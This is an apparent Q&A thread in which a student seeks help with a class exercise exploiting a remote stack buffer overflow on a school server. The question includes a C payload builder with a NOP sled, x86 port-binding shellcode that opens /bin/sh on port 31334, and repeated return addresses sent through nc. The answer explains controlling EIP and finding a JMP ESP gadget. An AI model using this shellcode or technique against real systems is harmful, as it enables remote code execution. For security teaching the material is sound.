# Need help figuring out a remote buffer overflow

Tags: linux, security, buffer-overflow

It's for a class assignment. I'm kinda stuck and I only have some questions to help me move along. (No cheating for me :p) Brutal assignment for an undergrad class I think...

What we're supposed to do:

nc compName.cs.myschool.edu 9050

There's a server listening / echoing if we type some stuff then hit Ctrl+D.
We need to use that input to hack the server program and create an account with sudo privileges.

Here's the relevant code:

```
int main(int argc, char const *argv[])
{
    char input[1000];
    int sockfd, newsockfd, portno, clilen, val = 1;
    struct sockaddr_in serv_addr, cli_addr;

    // some server code that I don't understand but probably isn't super relevant

    dup2(newsockfd, 0);   // bind stdin
    dup2(newsockfd, 1);   // bind stdout
    dup2(newsockfd, 2);   // bind stderr

    bufferCopy( input, 0x1000, stdin );
    printf("You entered: %s\n", input );        

    close(newsockfd);
    close(sockfd);
    return 0;
}

void bufferCopy( char * input, int inputLen, FILE * file )
{
    int i = 0;
    int c = 0;
    while( (c = fgetc( file )) != EOF  &&  i < inputLen - 2 )
    {
        input[i++] = c;
    }
    input[i] = 0;    
}
```

**UPDATE:**
I know what I need to do:

- No-op sled (a bunch of 0x90's)
- followed by the port-binding shellcode (from by book)
- followed by the return address (address of "input" variable) repeated a bunch of times

**UPDATE:**
What I'm doing:

- I write a file using the following code.
- cat attackCode | nc compName.cs.myschool.edu 9090

  ```
  static const int  NUM_NOPS = 800;
  static const char NOP = 0x90;
  static const int  NUM_ADDRESSES = 800;

  static char nopSled[800];
  char shellcode[] = { // on port 31334 == 0x7a66
      "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
      "\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x66\x66\x53\x89\xe1\x6a\x10"
      "\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80"
      "\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f"
      "\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
      "\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"
  };
  static const char returnAddress[] = {0xbf, 0xff, 0xf4, 0x40};

  int i=0;
  for(i=0; i < NUM_NOPS; i++){
      nopSled[i] = NOP;
  }

  FILE * pFile;
  pFile = fopen("attackCode", "w");
  fwrite( nopSled, 1, sizeof(nopSled), pFile );   
  fwrite( shellcode, 1, 92, pFile );
  for(i=0; i < NUM_ADDRESSES; i++ ){
      fwrite( returnAddress, 1, 4, pFile );
  }
  fclose(pFile);
  ```

**UPDATE:**
What I don't understand:

- Where the return pointer is in memory.... How can I find this?
- ^ and therefore how long the No-op part needs to be, or how many times to repeat the return address
- What the address of "input" is --- getting different values for printf(%p) and from gdb
- Why I'm not getting ANYTHING happening... not even a segfault if I write a LOT of No-ops etc.

Any help would be greatly appreciated!

Comment: If this is for a security class, they should've already covered shellcode. You simply need a piece of shellcode to do the problem. Also, I believe `stdin` and `stdout` should still be bound unless they are `CLOEXEC`.

Comment: We don't have any access to the actual program, so I can't just overwrite with a string similar to"\0x00..." from the program itself. At least, that's my understanding of shellcode... The attack must be done directly from the nc command.

Comment: Shellcode is simply a snippet of (machine) code that will give you a shell. Look back in your notes, and see how it can be applied. Note that it is typical for shellcode to use "raw" system calls instead of syscall wrappers (as C normally does).

Comment: I think you are on the right track.  You may want to start with finding main and then the return so you can turn that into a jmp.  Do it one step at a time.

Comment: You may want to read this, and the links from it: http://badishi.com/basic-shellcode-example/

Comment: Ah ok, it looks like the shellcode on that site or from my book will work and I don't need to write assembly and assemble it. Thanks.
One more question: I'm getting very different values for the address of "input" when I do a printf("%p",input) from the server code (not a debug build) vs. when I use (gdb) x/s. It makes sense, and I guess it would be safest to use the printf result?

Answer (score 4):

Normally, you would do the following steps:

1. Fuzz for an exploitable buffer.
2. Figure out how to control EIP.
3. Figure out how to get to your shellcode.

As for the first point, you’ve already found a way to trigger the overflow (basically any input value greater than 1000 bytes).

Since a buffer overflow on the stack overwrites data below the buffer’s address and since `input` is allocated on the stack in the `main` function’s frame, some part of your buffer will overwrite the `main` call’s return address. To find out which part overwrites EIP, you can use [metasploit’s *pattern_create* and *pattern_offset* tools](https://github.com/rapid7/metasploit-framework/tree/master/tools).

Now the tricky part is probably finding a way to effectively modifying EIP to jump to your shellcode. With a buffer like this:

```
AA…AA BBBB CC…CC
```

The stack at the moment of `main`’s return would look like this:

```
     ⋮
0x41414141
0x41414141
0x42424242 <= ESP
0x43434343
0x43434343
     ⋮
```

Since return sets EIP to the value that is on top of the stack (here `BBBB`) and lowers the stack by decreasing the stack pointer, a `JMP ESP` will jump right to your shellcode just before the `BBBB`:

```
     ⋮
0x41414141
0x41414141
0x42424242 
0x43434343 <= ESP,EIP
0x43434343
     ⋮
```

To find a `JMP ESP` instruction, look at the loaded modules/libraries and inspect them within gdb with:

```
find /b <from addr>, <to addr>, 0xff, 0xe4
```

to find the address of an `JMP ESP` that you can use to overwrite the return address on the stack with to jump to your shellcode.